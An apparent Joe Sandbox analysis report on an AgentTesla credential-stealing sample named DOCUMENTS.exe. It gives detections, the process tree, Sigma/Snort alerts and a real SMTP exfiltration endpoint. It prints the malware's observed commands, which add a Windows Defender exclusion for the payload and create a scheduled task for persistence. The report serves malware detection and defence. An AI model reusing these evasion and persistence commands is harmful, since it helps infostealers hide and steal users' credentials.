Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOCUMENTS.exe

Overview

General Information

Sample name:DOCUMENTS.exe
Analysis ID:1427366
MD5:e8cf42736f27344d295f0154e8f51097
SHA1:162fc94fff43fb35b2612ce4ecfdf1cc1c7a68a1
SHA256:2ecbed1e01a6404917129a03e0820fbae016372fadda8c057603a78a55fecd4c
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DOCUMENTS.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\DOCUMENTS.exe" MD5: E8CF42736F27344D295F0154E8F51097)
    • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7888 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8044 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • bgURAojpNNIb.exe (PID: 8136 cmdline: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe MD5: E8CF42736F27344D295F0154E8F51097)
    • schtasks.exe (PID: 6800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 18 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.DOCUMENTS.exe.4ab9de8.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.DOCUMENTS.exe.4ab9de8.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.DOCUMENTS.exe.4ab9de8.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x316cb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3173d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x317c7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31859:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x318c3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31935:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x319cb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x31a5b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  14.2.bgURAojpNNIb.exe.3bd6948.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    14.2.bgURAojpNNIb.exe.3bd6948.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 22 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", ProcessId: 7768, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", ProcessId: 7768, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe, ParentImage: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe, ParentProcessId: 8136, ParentProcessName: bgURAojpNNIb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp", ProcessId: 6800, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.222.226.100, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 8044, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49708
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", ProcessId: 7888, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", ProcessId: 7768, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", ProcessId: 7888, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:04/17/24-15:08:20.936584
                      SID:2855542
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:20.936584
                      SID:2855245
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:25.918218
                      SID:2855542
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:25.918218
                      SID:2855245
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:25.918218
                      SID:2840032
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:20.936584
                      SID:2851779
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:25.917883
                      SID:2839723
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:20.936511
                      SID:2839723
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:25.918218
                      SID:2851779
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:25.917883
                      SID:2030171
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:20.936584
                      SID:2840032
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/17/24-15:08:20.936511
                      SID:2030171
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: DOCUMENTS.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeAvira: detection malicious, Label: HEUR/AGEN.1309705
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeVirustotal: Detection: 35%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: DOCUMENTS.exeReversingLabs: Detection: 44%
                      Source: DOCUMENTS.exeVirustotal: Detection: 35%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: DOCUMENTS.exeJoe Sandbox ML: detected
                      Source: DOCUMENTS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: DOCUMENTS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 4x nop then jmp 071B2CB0h1_2_071B2D8A
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 4x nop then jmp 071B2CB0h1_2_071B2DDF
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 4x nop then jmp 071B2CB0h1_2_071B2FD8

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.10:49710 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.10:49710 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.10:49710 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.10:49710 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.10:49710 -> 162.222.226.100:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.10:49710 -> 162.222.226.100:587
                      Source: global trafficTCP traffic: 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: Joe Sandbox ViewIP Address: 162.222.226.100 162.222.226.100
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: global trafficTCP traffic: 192.168.2.10:49708 -> 162.222.226.100:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownDNS traffic detected: queries for: mail.thelamalab.com
                      Source: RegSvcs.exe, 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.thelamalab.com
                      Source: DOCUMENTS.exe, 00000001.00000002.1357702369.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1415939466.0000000002B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DOCUMENTS.exe, 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, oAKy.cs.Net Code: _0Wk

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: 1.2.DOCUMENTS.exe.2d92488.0.raw.unpack, SQL.csLarge array initialization: : array initializer size 33608
                      Source: 1.2.DOCUMENTS.exe.6f20000.5.raw.unpack, SQL.csLarge array initialization: : array initializer size 33608
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: DOCUMENTS.exe
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_011BD2A41_2_011BD2A4
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D96601_2_070D9660
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D13301_2_070D1330
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D10281_2_070D1028
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070DC6101_2_070DC610
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D964F1_2_070D964F
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D05E91_2_070D05E9
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D05F81_2_070D05F8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D03A11_2_070D03A1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D03B01_2_070D03B0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070DE1501_2_070DE150
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070DC1D81_2_070DC1D8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D21D81_2_070D21D8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D21E81_2_070D21E8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D00061_2_070D0006
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D10181_2_070D1018
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D00401_2_070D0040
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070DEA181_2_070DEA18
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070DEA281_2_070DEA28
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070DCA481_2_070DCA48
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D396F1_2_070D396F
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D39971_2_070D3997
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D39A81_2_070D39A8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 1_2_070D59A01_2_070D59A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_015896E013_2_015896E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01589B3013_2_01589B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01584A9813_2_01584A98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0158CFA013_2_0158CFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01583E8013_2_01583E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_015841C813_2_015841C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_066956D013_2_066956D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06693F4813_2_06693F48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0669BCF813_2_0669BCF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06698DCD13_2_06698DCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06692AF013_2_06692AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06699AD813_2_06699AD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0669004013_2_06690040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06694FF013_2_06694FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0669323313_2_06693233
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_029DD2A414_2_029DD2A4
